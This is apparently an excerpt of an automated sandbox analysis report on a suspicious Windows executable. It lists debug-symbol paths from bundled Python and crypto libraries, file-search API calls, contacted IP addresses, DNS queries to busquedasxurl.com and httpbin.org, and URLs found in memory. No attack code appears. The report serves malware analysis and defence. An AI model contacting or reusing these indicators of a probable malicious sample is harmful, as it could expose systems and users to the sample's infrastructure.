      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: MkWMm5piE5.exe, 00000000.00000003.1340184493.0000023382119000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2603711740.00007FFEEF563000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb source: win32api.pyd.0.dr
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: MkWMm5piE5.exe, 00000000.00000003.1340184493.0000023382119000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2603711740.00007FFEEF563000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb** source: MkWMm5piE5.exe, 00000002.00000002.2596967122.00007FFEDD1C0000.00000002.00000001.01000000.0000001D.sdmp, pywintypes312.dll.0.dr
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: MkWMm5piE5.exe, 00000002.00000002.2601513284.00007FFEEBAA5000.00000002.00000001.01000000.0000001E.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603253047.00007FFEECEC3000.00000002.00000001.01000000.0000000D.sdmp, select.pyd.0.dr
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596967122.00007FFEDD1C0000.00000002.00000001.01000000.0000001D.sdmp, pywintypes312.dll.0.dr
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb!! source: win32api.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599427551.00007FFEE6F31000.00000002.00000001.01000000.00000007.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603436449.00007FFEEF2F7000.00000002.00000001.01000000.00000016.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: MkWMm5piE5.exe, 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32crypt.pdb source: MkWMm5piE5.exe, 00000002.00000002.2597055508.00007FFEDD1F1000.00000002.00000001.01000000.0000001C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: MkWMm5piE5.exe, 00000002.00000002.2598927131.00007FFEDDEBC000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603608651.00007FFEEF458000.00000002.00000001.01000000.00000013.sdmp
      Source: Binary string: crypto\stack\stack.cOPENSSL_sk_dupOPENSSL_sk_deep_copysk_reserveOPENSSL_sk_new_reserveOPENSSL_sk_reserveOPENSSL_sk_insertOPENSSL_sk_seti=%dcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC3.1.4built on: Fri Nov 24 00:12:45 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptoOPENSSL_atexitcrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599213917.00007FFEDEC42000.00000002.00000001.01000000.00000015.sdmp
      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-312\Release\win32crypt.pdb!! source: MkWMm5piE5.exe, 00000002.00000002.2597055508.00007FFEDD1F1000.00000002.00000001.01000000.0000001C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603162943.00007FFEEC0D3000.00000002.00000001.01000000.0000000E.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdbcQ source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: MkWMm5piE5.exe, 00000002.00000002.2598927131.00007FFEDDEBC000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599036751.00007FFEDDEDD000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdb source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: MkWMm5piE5.exe, 00000002.00000002.2603342065.00007FFEED7A4000.00000002.00000001.01000000.0000000B.sdmp, _wmi.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: MkWMm5piE5.exe, 00000002.00000002.2598835616.00007FFEDDE89000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599120809.00007FFEDEC0F000.00000002.00000001.01000000.0000001A.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: MkWMm5piE5.exe, 00000002.00000002.2603342065.00007FFEED7A4000.00000002.00000001.01000000.0000000B.sdmp, _wmi.pyd.0.dr
      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2591160543.000001E4C86D0000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: MkWMm5piE5.exe, 00000002.00000002.2601513284.00007FFEEBAA5000.00000002.00000001.01000000.0000001E.sdmp
      Source: Binary string: D:\a\1\b\libssl-3.pdb source: MkWMm5piE5.exe, 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmp
      Source: Binary string: X509_SIGPKCS8_encrypt_excrypto\pkcs12\p12_p8e.cPKCS8_set0_pbe_excompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: MkWMm5piE5.exe, 00000002.00000002.2599299859.00007FFEDEC6D000.00000002.00000001.01000000.00000010.sdmp
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC88D0 FindFirstFileExW,FindClose,0_2_00007FF7FBDC88D0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7FBDD7E4C
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7FBDE1EE4
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7FBDD7E4C
      Source: Joe Sandbox ViewIP Address: 82.180.136.22 82.180.136.22
      Source: Joe Sandbox ViewIP Address: 44.196.3.45 44.196.3.45
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: busquedasxurl.com
      Source: global trafficDNS traffic detected: DNS query: httpbin.org
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BDD000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
      Source: MkWMm5piE5.exe, 00000002.00000002.2592399511.000001E4C96B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369245060.000001E4C9189000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366935243.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1367667918.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ce
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895620190.000001E4C9D62000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895390615.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1896118922.000001E4C9D65000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C8FB0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895602221.000001E4C9CD1000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895518225.000001E4C9CDD000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895322714.000001E4C9CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895620190.000001E4C9D62000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895390615.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1896118922.000001E4C9D65000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl8
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crle
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crlQ
      Source: MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crlVu
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
      Source: MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlD
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
      Source: MkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crle
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
      Source: MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8C0F000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8BB0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA614000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C5E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593611132.000001E4CA6A0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
      Source: MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
      Source: MkWMm5piE5.exe, 00000002.00000002.2592502261.000001E4C9880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
      Source: MkWMm5piE5.exe, 00000002.00000002.2592502261.000001E4C9880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
      Source: MkWMm5piE5.exe, 00000002.00000002.2592574533.000001E4C9980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
      Source: MkWMm5piE5.exe, 00000002.00000003.1369245060.000001E4C9096000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
      Source: MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
      Source: MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9092000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
      Source: powershell.exe, 00000003.00000002.1418909685.0000023333214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1399688646.0000023324A97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es%
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es?
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
      Source: MkWMm5piE5.exe, 00000002.00000002.2592574533.000001E4C9980000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
      Source: powershell.exe, 00000003.00000002.1399688646.00000233233D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C8FB0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895518225.000001E4C9CDD000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895322714.000001E4C9CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C8FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/y
      Source: powershell.exe, 00000003.00000002.1399688646.00000233231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
      Source: MkWMm5piE5.exe, 00000002.00000002.2593611132.000001E4CA6A0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
      Source: MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
